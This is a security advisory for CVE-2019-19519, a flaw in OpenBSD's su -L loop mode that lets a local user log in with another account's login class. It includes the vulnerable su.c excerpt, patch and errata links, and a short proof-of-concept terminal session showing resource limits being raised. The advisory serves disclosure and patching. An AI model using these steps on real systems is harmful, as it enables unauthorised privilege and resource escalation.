ASA-2019-00650 – OpenBSD: Local privilege escalation via su


Allele Security Alert

ASA-2019-00650

Identifier(s)

ASA-2019-00650, CVE-2019-19519

Title

Local privilege escalation via su

Vendor(s)

The OpenBSD Project

Product(s)

OpenBSD

Affected version(s)

OpenBSD versions 6.6 before errata 012
OpenBSD versions 6.5 before errata 023

Fixed version(s)

OpenBSD version 6.6 errata 012
OpenBSD version 6.5 errata 023

OpenBSD versions 6.6 with the following patch applied:

012_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/012_suauth.patch.sig

OpenBSD versions 6.5 with the following patch applied:

023_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/023_suauth.patch.sig

Proof of concept

Yes

Description

A local attacker can exploit su’s -L option (“Loop until a correct username and password combination is entered”) to log in as themselves but with another user’s login class (with the exception of root’s login class if the attacker is not in the group “wheel”), because the class variable is set once and never reset.

Technical details

Excerpt from the vulnerable su.c (elided lines marked with "..."):

int
main(int argc, char **argv)
{
...
	for (;;) {
...
		/* class is only assigned while it is still NULL, so the class picked
		 * for the first name entered survives a failed attempt and is reused
		 * on every later iteration of the -L loop */
		if (!class && pwd && pwd->pw_class && pwd->pw_class[0] != '\0')
			class = strdup(pwd->pw_class);

In the following example, Jane (who is a member of the group “wheel”) logs in with root’s login class (“daemon”), thereby increasing her resource limits:

$ id
uid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)

$ ulimit -H -a
...
processes 512

$ su -l -L
login: root
Password:
Login incorrect
login: jane
Password:

$ id
uid=1000(jane) gid=1000(jane) groups=1000(jane), 0(wheel)

$ ulimit -H -a
...
processes 1310

In the following example, John (who is not a member of the group “wheel”) logs in with _pbuild’s login class (“pbuild”), thereby increasing his resource limits:

$ id
uid=1001(john) gid=1001(john) groups=1001(john)

$ ulimit -H -a
...
data(kbytes) 786432
...
processes 256

$ su -l -L
login: _pbuild
Password:
Login incorrect
login: john
Password:

$ id
uid=1001(john) gid=1001(john) groups=1001(john)

$ ulimit -H -a
...
data(kbytes) 33554432
...
processes 1024

Credits

Qualys Research Team

Reference(s)

OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html

OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html

012_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/012_suauth.patch.sig

023_suauth.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/023_suauth.patch.sig

In -L (loop) mode, reset the login class each time through the loop.
https://github.com/openbsd/src/commit/13053edc2f30540fa66763e29d0a8eec43f1aa53

oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5

Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14

Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8

CVE-2019-19519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19519

CVE-2019-19519
https://nvd.nist.gov/vuln/detail/CVE-2019-19519

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: December 16, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.